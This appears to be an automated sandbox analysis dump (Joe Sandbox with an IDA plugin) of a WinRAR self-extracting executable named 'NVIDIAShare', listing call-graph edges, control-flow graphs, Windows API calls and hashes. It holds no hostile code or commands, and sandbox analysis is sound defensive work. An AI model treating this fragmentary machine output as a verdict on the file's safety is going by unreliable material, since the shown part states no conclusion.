24965->24969 24967 1001461 24966->24967 24968 100b505 84 API calls 24967->24968 24967->24969 24968->24969 24969->24936 24971 1001a0e __EH_prolog 24970->24971 24983 1001a61 24971->24983 24985 1001b9b 24971->24985 25110 10013ba 24971->25110 24973 1001bc7 25113 100138b 74 API calls 24973->25113 24976 1003b2d 101 API calls 24980 1001c12 24976->24980 24977 1001bd4 24977->24976 24977->24985 24978 1001c5a 24982 1001c8d 24978->24982 24978->24985 25114 100138b 74 API calls 24978->25114 24980->24978 24981 1003b2d 101 API calls 24980->24981 24981->24980 24982->24985 24988 1009e80 79 API calls 24982->24988 24983->24973 24983->24977 24983->24985 24984 1003b2d 101 API calls 24986 1001cde 24984->24986 24985->24949 24986->24984 24986->24985 24987 1009e80 79 API calls 24987->24983 24988->24986 25132 100cf3d 24989->25132 24991 1008440 25136 10113d2 GetSystemTime SystemTimeToFileTime 24991->25136 24993 10083a3 24993->24946 24994 1011b66 24993->24994 25141 101de6b 24994->25141 24998 1001f72 __EH_prolog 24997->24998 25000 1001fa6 24998->25000 25149 10019af 24998->25149 25000->24951 25002 1003b39 25001->25002 25003 1003b3d 25001->25003 25002->24951 25012 1009e80 79 API calls 25003->25012 25004 1003b4f 25005 1003b78 25004->25005 25006 1003b6a 25004->25006 25280 100286b 101 API calls 3 library calls 25005->25280 25008 1003baa 25006->25008 25279 10032f7 89 API calls 2 library calls 25006->25279 25008->24951 25010 1003b76 25010->25008 25281 10020d7 74 API calls 25010->25281 25012->25004 25014 1008498 __EH_prolog 25013->25014 25017 10084d5 25014->25017 25024 1008513 25014->25024 25306 1018c8d 103 API calls 25014->25306 25016 10084f5 25018 10084fa 25016->25018 25019 100851c 25016->25019 25017->25016 25022 100857a 25017->25022 25017->25024 25018->25024 25307 1007a0d 152 API calls 25018->25307 25019->25024 25308 1018c8d 103 API calls 25019->25308 25022->25024 25282 1005d1a 25022->25282 25024->24951 25025 1008605 25025->25024 25288 1008167 25025->25288 25028 1008797 25029 100a56d 7 API calls 25028->25029 25032 1008802 25028->25032 25029->25032 25031 100d051 82 API calls 25038 100885d 25031->25038 25294 1007c0d 25032->25294 25033 1008992 25034 1008a5f 25033->25034 25041 10089e1 25033->25041 25039 1008ab6 25034->25039 25051 1008a6a 25034->25051 25035 100898b 25311 1002021 74 API calls 25035->25311 25038->25024 25038->25031 25038->25033 25038->25035 25309 1008117 84 API calls 25038->25309 25310 1002021 74 API calls 25038->25310 25042 1008a4c 25039->25042 25314 1007fc0 97 API calls 25039->25314 25040 1008ab4 25043 100959a 80 API calls 25040->25043 25041->25042 25044 100a231 3 API calls 25041->25044 25048 1008b14 25041->25048 25042->25040 25042->25048 25043->25024 25047 1008a19 25044->25047 25046 100959a 80 API calls 25046->25024 25047->25042 25312 10092a3 97 API calls 25047->25312 25060 1008b82 25048->25060 25089 1009105 25048->25089 25315 10098bc 25048->25315 25049 100ab1a 8 API calls 25052 1008bd1 25049->25052 25051->25040 25313 1007db2 101 API calls 25051->25313 25055 100ab1a 8 API calls 25052->25055 25072 1008be7 25055->25072 25058 1008b70 25319 1006e98 77 API calls 25058->25319 25060->25049 25061 1008cbc 25062 1008e40 25061->25062 25063 1008d18 25061->25063 25065 1008e52 25062->25065 25066 1008e66 25062->25066 25087 1008d49 25062->25087 25064 1008d8a 25063->25064 25067 1008d28 25063->25067 25073 1008167 19 API calls 25064->25073 25068 1009215 123 API calls 25065->25068 25069 1013377 75 API calls 25066->25069 25070 1008d6e 25067->25070 25076 1008d37 25067->25076 25068->25087 25071 1008e7f 25069->25071 25070->25087 25322 10077b8 111 API calls 25070->25322 25325 1013020 123 API calls 25071->25325 25072->25061 25079 100981a 79 API calls 25072->25079 25081 1008c93 25072->25081 25077 1008dbd 25073->25077 25321 1002021 74 API calls 25076->25321 25082 1008df5 25077->25082 25083 1008de6 25077->25083 25077->25087 25079->25081 25081->25061 25320 1009a3c 82 API calls 25081->25320 25324 1009155 93 API calls __EH_prolog 25082->25324 25323 1007542 85 API calls 25083->25323 25090 1008f85 25087->25090 25326 1002021 74 API calls 25087->25326 25088 1009090 25088->25089 25091 100a4ed 3 API calls 25088->25091 25089->25046 25090->25088 25090->25089 25092 100903e 25090->25092 25300 1009f09 SetEndOfFile 25090->25300 25093 10090eb 25091->25093 25301 1009da2 25092->25301 25093->25089 25327 1002021 74 API calls 25093->25327 25096 1009085 25098 1009620 77 API calls 25096->25098 25098->25088 25099 10090fb 25328 1006dcb 76 API calls 25099->25328 25102 10016a4 25101->25102 25344 100cee1 25102->25344 25106 1009f59 25105->25106 25107 1009f63 25106->25107 25352 1006d0c 78 API calls 25106->25352 25107->24937 25109->24949 25115 1001732 25110->25115 25112 10013d6 25112->24987 25113->24985 25114->24982 25116 1001748 25115->25116 25127 10017a0 __InternalCxxFrameHandler 25115->25127 25117 1001771 25116->25117 25128 1006c36 76 API calls __vswprintf_c_l 25116->25128 25119 10017c7 25117->25119 25120 100178d ___std_exception_copy 25117->25120 25122 1023e3e 22 API calls 25119->25122 25120->25127 25130 1006ca7 75 API calls 25120->25130 25121 1001767 25129 1006ca7 75 API calls 25121->25129 25124 10017ce 25122->25124 25124->25127 25131 1006ca7 75 API calls 25124->25131 25127->25112 25128->25121 25129->25117 25130->25127 25131->25127 25133 100cf4d 25132->25133 25135 100cf54 25132->25135 25137 100981a 25133->25137 25135->24991 25136->24993 25138 1009833 25137->25138 25140 1009e80 79 API calls 25138->25140 25139 1009865 25139->25135 25140->25139 25142 101de78 25141->25142 25143 100e617 53 API calls 25142->25143 25144 101de9b 25143->25144 25145 1004092 _swprintf 51 API calls 25144->25145 25146 101dead 25145->25146 25147 101d4d4 16 API calls 25146->25147 25148 1011b7c 25147->25148 25148->24946 25150 10019bf 25149->25150 25152 10019bb 25149->25152 25153 10018f6 25150->25153 25152->25000 25154 1001908 25153->25154 25155 1001945 25153->25155 25156 1003b2d 101 API calls 25154->25156 25161 1003fa3 25155->25161 25159 1001928 25156->25159 25159->25152 25164 1003fac 25161->25164 25162 1003b2d 101 API calls 25162->25164 25163 1001966 25163->25159 25166 1001e50 25163->25166 25164->25162 25164->25163 25178 1010e08 25164->25178 25167 1001e5a __EH_prolog 25166->25167 25186 1003bba 25167->25186 25169 1001e84 25170 1001732 78 API calls 25169->25170 25172 1001f0b 25169->25172 25171 1001e9b 25170->25171 25214 10018a9 78 API calls 25171->25214 25172->25159 25174 1001eb3 25176 1001ebf _wcslen 25174->25176 25215 1011b84 MultiByteToWideChar 25174->25215 25216 10018a9 78 API calls 25176->25216 25179 1010e0f 25178->25179 25180 1010e2a 25179->25180 25184 1006c31 RaiseException CallUnexpected 25179->25184 25182 1010e3b SetThreadExecutionState 25180->25182 25185 1006c31 RaiseException CallUnexpected 25180->25185 25182->25164 25184->25180 25185->25182 25187 1003bc4 __EH_prolog 25186->25187 25188 1003bf6 25187->25188 25189 1003bda 25187->25189 25191 1003e51 25188->25191 25194 1003c22 25188->25194 25242 100138b 74 API calls 25189->25242 25259 100138b 74 API calls 25191->25259 25193 1003be5 25193->25169 25194->25193 25217 1013377 25194->25217 25196 1003ca3 25197 1003d2e 25196->25197 25213 1003c9a 25196->25213 25245 100d051 25196->25245 25227 100ab1a 25197->25227 25198 1003c9f 25198->25196 25244 10020bd 78 API calls 25198->25244 25200 1003c71 25200->25196 25200->25198 25201 1003c8f 25200->25201 25243 100138b 74 API calls 25201->25243 25203 1003d41 25207 1003dd7 25203->25207 25208 1003dc7 25203->25208 25251 1013020 123 API calls 25207->25251 25231 1009215 25208->25231 25211 1003dd5 25211->25213 25252 1002021 74 API calls 25211->25252 25253 1012297 25213->25253 25214->25174 25215->25176 25216->25172 25218 101338c 25217->25218 25221 1013396 ___std_exception_copy 25217->25221 25260 1006ca7 75 API calls 25218->25260 25220 10134c6 25262 102238d RaiseException 25220->25262 25221->25220 25222 101341c 25221->25222 25226 1013440 _abort 25221->25226 25261 10132aa 75 API calls 3 library calls 25222->25261 25225 10134f2 25226->25200 25228 100ab28 25227->25228 25230 100ab32 25227->25230 25229 101eb38 8 API calls 25228->25229 25229->25230 25230->25203 25232 100921f __EH_prolog 25231->25232 25263 1007c64 25232->25263 25235 10013ba 78 API calls 25236 1009231 25235->25236 25266 100d114 25236->25266 25238 100928a 25238->25211 25240 100d114 118 API calls 25241 1009243 25240->25241 25241->25238 25241->25240 25275 100d300 97 API calls __InternalCxxFrameHandler 25241->25275 25242->25193 25243->25213 25244->25196 25246 100d072 25245->25246 25247 100d084 25245->25247 25276 100603a 82 API calls 25246->25276 25277 100603a 82 API calls 25247->25277 25250 100d07c 25250->25197 25251->25211 25252->25213 25254 10122a1 25253->25254 25255 10122ba 25254->25255 25258 10122ce 25254->25258 25278 1010eed 86 API calls 25255->25278 25257 10122c1 25257->25258 25259->25193 25260->25221 25261->25226 25262->25225 25264 100b146 GetVersionExW 25263->25264 25265 1007c69 25264->25265 25265->25235 25270 100d12a __InternalCxxFrameHandler 25266->25270 25267 100d29a 25268 100d2ce 25267->25268 25269 100d0cb 6 API calls 25267->25269 25271 1010e08 SetThreadExecutionState RaiseException 25268->25271 25269->25268 25270->25267 25272 1018c8d 103 API calls 25270->25272 25273 100d291 25270->25273 25274 100ac05 91 API calls 25270->25274 25271->25273 25272->25270 25273->25241 25274->25270 25275->25241 25276->25250 25277->25250 25278->25257 25279->25010 25280->25010 25281->25008 25283 1005d2a 25282->25283 25329 1005c4b 25283->25329 25286 1005d5d 25287 1005d95 25286->25287 25334 100b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25286->25334 25287->25025 25290 1008186 25288->25290 25289 1008232 25340 1011fac CharUpperW 25289->25340 25290->25289 25341 100be5e 19 API calls __InternalCxxFrameHandler 25290->25341 25293 100823b 25293->25028 25295 1007c22 25294->25295 25296 1007c5a 25295->25296 25342 1006e7a 74 API calls 25295->25342 25296->25038 25298 1007c52 25343 100138b 74 API calls 25298->25343 25300->25092 25302 1009db3 25301->25302 25304 1009dc2 25301->25304 25303 1009db9 FlushFileBuffers 25302->25303 25302->25304 25303->25304 25305 1009e3f SetFileTime 25304->25305 25305->25096 25306->25017 25307->25024 25308->25024 25309->25038 25310->25038 25311->25033 25312->25042 25313->25040 25314->25042 25316 10098c5 GetFileType 25315->25316 25317 1008b5a 25315->25317 25316->25317 25317->25060 25318 1002021 74 API calls 25317->25318 25318->25058 25319->25060 25320->25061 25321->25087 25322->25087 25323->25087 25324->25087 25325->25087 25326->25090 25327->25099 25328->25089 25335 1005b48 25329->25335 25332 1005b48 2 API calls 25333 1005c6c 25332->25333 25333->25286 25334->25286 25338 1005b52 25335->25338 25336 1005c3a 25336->25332 25336->25333 25338->25336 25339 100b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25338->25339 25339->25338 25340->25293 25341->25289 25342->25298 25343->25296 25345 100cef2 25344->25345 25350 100a99e 86 API calls 25345->25350 25347 100cf24 25351 100a99e 86 API calls 25347->25351 25349 100cf2f 25350->25347 25351->25349 25352->25107 25354 100a6a8 25353->25354 25355 100a6c1 FindFirstFileW 25354->25355 25356 100a727 FindNextFileW 25354->25356 25358 100a6d0 25355->25358 25363 100a709 25355->25363 25357 100a732 GetLastError 25356->25357 25356->25363 25357->25363 25359 100bb03 GetCurrentDirectoryW 25358->25359 25360 100a6e0 25359->25360 25361 100a6e4 FindFirstFileW 25360->25361 25362 100a6fe GetLastError 25360->25362 25361->25362 25361->25363 25362->25363 25363->24958 25364->24795 25365->24802 25366->24802 25367->24804 25368->24810 25370 1009f42 78 API calls 25369->25370 25371 1001fe8 25370->25371 25372 1001a04 101 API calls 25371->25372 25375 1002005 25371->25375 25373 1001ff5 25372->25373 25373->25375 25376 100138b 74 API calls 25373->25376 25375->24818 25375->24819 25376->25375 25377 10013e1 84 API calls 2 library calls 25476 10121e0 26 API calls std::bad_exception::bad_exception 25524 10194e0 GetClientRect 25525 101f2e0 46 API calls __RTC_Initialize 25526 102bee0 GetCommandLineA GetCommandLineW 25379 101eae7 25380 101eaf1 25379->25380 25381 101e85d ___delayLoadHelper2@8 14 API calls 25380->25381 25382 101eafe 25381->25382 25527 101f4e7 29 API calls _abort 25478 100f1e8 FreeLibrary 25480 10095f0 80 API calls 25481 101fd4f 9 API calls 2 library calls 25528 1005ef0 82 API calls 25390 10298f0 25398 102adaf 25390->25398 25394 102990c 25395 1029919 25394->25395 25406 1029920 11 API calls 25394->25406 25397 1029904 25399 102ac98 _abort 5 API calls 25398->25399 25400 102add6 25399->25400 25401 102adee TlsAlloc 25400->25401 25402 102addf 25400->25402 25401->25402 25403 101fbbc _ValidateLocalCookies 5 API calls 25402->25403 25404 10298fa 25403->25404 25404->25397 25405 1029869 20 API calls 2 library calls 25404->25405 25405->25394 25406->25397 25407 102abf0 25408 102abfb 25407->25408 25409 102af0a 11 API calls 25408->25409 25410 102ac24 25408->25410 25411 102ac20 25408->25411 25409->25408 25413 102ac50 DeleteCriticalSection 25410->25413 25413->25411 25529 10288f0 7 API calls ___scrt_uninitialize_crt 25531 1022cfb 38 API calls 4 library calls

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 01010863: GetModuleHandleW.KERNEL32(kernel32), ref: 0101087C
                                                              • Part of subcall function 01010863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0101088E
                                                              • Part of subcall function 01010863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 010108BF
                                                              • Part of subcall function 0101A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0101A655
                                                              • Part of subcall function 0101AC16: OleInitialize.OLE32(00000000), ref: 0101AC2F
                                                              • Part of subcall function 0101AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101AC66
                                                              • Part of subcall function 0101AC16: SHGetMalloc.SHELL32(01048438), ref: 0101AC70
                                                            • GetCommandLineW.KERNEL32 ref: 0101DF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0101DF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0101DF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0101DFCE
                                                              • Part of subcall function 0101DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0101DBF4
                                                              • Part of subcall function 0101DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101DC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 0101DFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,0105EC90,00000800), ref: 0101DFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,0105EC90), ref: 0101DFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 0101E009
                                                            • _swprintf.LIBCMT ref: 0101E048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0101E05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0101E061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 0101E078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0101E0C9
                                                            • Sleep.KERNEL32(?), ref: 0101E0F7
                                                            • DeleteObject.GDI32 ref: 0101E130
                                                            • DeleteObject.GDI32(?), ref: 0101E140
                                                            • CloseHandle.KERNEL32 ref: 0101E183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3049964643-2656992072
                                                            • Opcode ID: 98571407ce26698e408db54a3c591e95b01a4d7f3a819676e33d0d0f1718ea66
                                                            • Instruction ID: 169e5dbff5c2af2d6a366f8b436719e9cd35bf404b3d500c8d1c4dd929759af2
                                                            • Opcode Fuzzy Hash: 98571407ce26698e408db54a3c591e95b01a4d7f3a819676e33d0d0f1718ea66
                                                            • Instruction Fuzzy Hash: F761E4B1904345AFE331ABA5DD88FAB7BECBB94704F00042DFAC596188DB7E9944C761

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 812 101a6c2-101a6df FindResourceW 813 101a6e5-101a6f6 SizeofResource 812->813 814 101a7db 812->814 813->814 815 101a6fc-101a70b LoadResource 813->815 816 101a7dd-101a7e1 814->816 815->814 817 101a711-101a71c LockResource 815->817 817->814 818 101a722-101a737 GlobalAlloc 817->818 819 101a7d3-101a7d9 818->819 820 101a73d-101a746 GlobalLock 818->820 819->816 821 101a7cc-101a7cd GlobalFree 820->821 822 101a74c-101a76a call 1020320 CreateStreamOnHGlobal 820->822 821->819 825 101a7c5-101a7c6 GlobalUnlock 822->825 826 101a76c-101a78e call 101a626 822->826 825->821 826->825 831 101a790-101a798 826->831 832 101a7b3-101a7c1 831->832 833 101a79a-101a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 101a7b0 833->834 834->832
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0101B73D,00000066), ref: 0101A6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A703
                                                            • LockResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A72D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0101A73E
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0101A762
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0101A7C6
                                                              • Part of subcall function 0101A626: GdipAlloc.GDIPLUS(00000010), ref: 0101A62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0101A7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 0101A7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                            • String ID: PNG
                                                            • API String ID: 211097158-364855578
                                                            • Opcode ID: 03066ddc74fc67631f2715b65c1019b2ae00592fe11e1429bc582744f819ae31
                                                            • Instruction ID: e05d5d054f1fd598029e52923233c4dccdc7b72c1e9bcef851d0c4173ac94a04
                                                            • Opcode Fuzzy Hash: 03066ddc74fc67631f2715b65c1019b2ae00592fe11e1429bc582744f819ae31
                                                            • Instruction Fuzzy Hash: 4F318F75601342AFD7219F65DC88D2B7FBCFF84661B000959F986C7218EB3AD8448BA0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1038 100a69b-100a6bf call 101ec50 1041 100a6c1-100a6ce FindFirstFileW 1038->1041 1042 100a727-100a730 FindNextFileW 1038->1042 1043 100a742-100a7ff call 1010602 call 100c310 call 10115da * 3 1041->1043 1045 100a6d0-100a6e2 call 100bb03 1041->1045 1042->1043 1044 100a732-100a740 GetLastError 1042->1044 1050 100a804-100a811 1043->1050 1046 100a719-100a722 1044->1046 1052 100a6e4-100a6fc FindFirstFileW 1045->1052 1053 100a6fe-100a707 GetLastError 1045->1053 1046->1050 1052->1043 1052->1053 1055 100a717 1053->1055 1056 100a709-100a70c 1053->1056 1055->1046 1056->1055 1058 100a70e-100a711 1056->1058 1058->1055 1061 100a713-100a715 1058->1061 1061->1046
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6C4
                                                              • Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A728
                                                            • GetLastError.KERNEL32(?,?,?,?,0100A592,000000FF,?,?), ref: 0100A734
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: b836a4f60e53b1d4c5fde3395dd085f2cc390187ab7799c6322274763df0cbb3
                                                            • Instruction ID: 82c9a94e331b1a8179dbaa81df9ac3a2e6ae24bb7387d15eb40314522a7b4148
                                                            • Opcode Fuzzy Hash: b836a4f60e53b1d4c5fde3395dd085f2cc390187ab7799c6322274763df0cbb3
                                                            • Instruction Fuzzy Hash: 56412F76600615EBDB26DF68CC84AE9B7B8FB48350F144196E59ED3240D7346E94CF90
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002,00000000), ref: 01027E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002,00000000), ref: 01027E16
                                                            • ExitProcess.KERNEL32 ref: 01027E28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: a410e23ef94be68e1cac884ec0301330f63077dd553ce9f0ac4f4a74ece202a6
                                                            • Instruction ID: ae39228f06da8265e714d8c693e5ad332db803b3f5f0ebbb7755172de69e6e96
                                                            • Opcode Fuzzy Hash: a410e23ef94be68e1cac884ec0301330f63077dd553ce9f0ac4f4a74ece202a6
                                                            • Instruction Fuzzy Hash: 2FE04F31000154ABCF126F54C988A89BF69FB24341B004454F8898A136CB3ADD51DB90
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 70b6d4f424a5b9c79c6cabe885fabd041b3294dc2ce5464bd21dc0bef3d80995
                                                            • Instruction ID: 1d3ccae0047f45bdf272886294366b4efea02d71dc036bfcf140d33b340f05a1
                                                            • Opcode Fuzzy Hash: 70b6d4f424a5b9c79c6cabe885fabd041b3294dc2ce5464bd21dc0bef3d80995
                                                            • Instruction Fuzzy Hash: D082C870D04246AEFF57DB68C894BFABBA9BF15200F0881FAD9C95B1C2D7715684CB60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0101B7E5
                                                              • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                              • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101B8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 0101B902
                                                            • TranslateMessage.USER32(?), ref: 0101B910
                                                            • DispatchMessageW.USER32(?), ref: 0101B91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0101B93D
                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0101B960
                                                            • GetDlgItem.USER32(?,00000068), ref: 0101B983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101B99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101B9B1
                                                              • Part of subcall function 0101D453: _wcslen.LIBCMT ref: 0101D47D
                                                            • SetFocus.USER32(00000000), ref: 0101B9B8
                                                            • _swprintf.LIBCMT ref: 0101BA24
                                                              • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                              • Part of subcall function 0101D4D4: GetDlgItem.USER32(00000068,0105FCB8), ref: 0101D4E8
                                                              • Part of subcall function 0101D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0101AF07,00000001,?,?,0101B7B9,0103506C,0105FCB8,0105FCB8,00001000,00000000,00000000), ref: 0101D510
                                                              • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101D51B
                                                              • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101D529
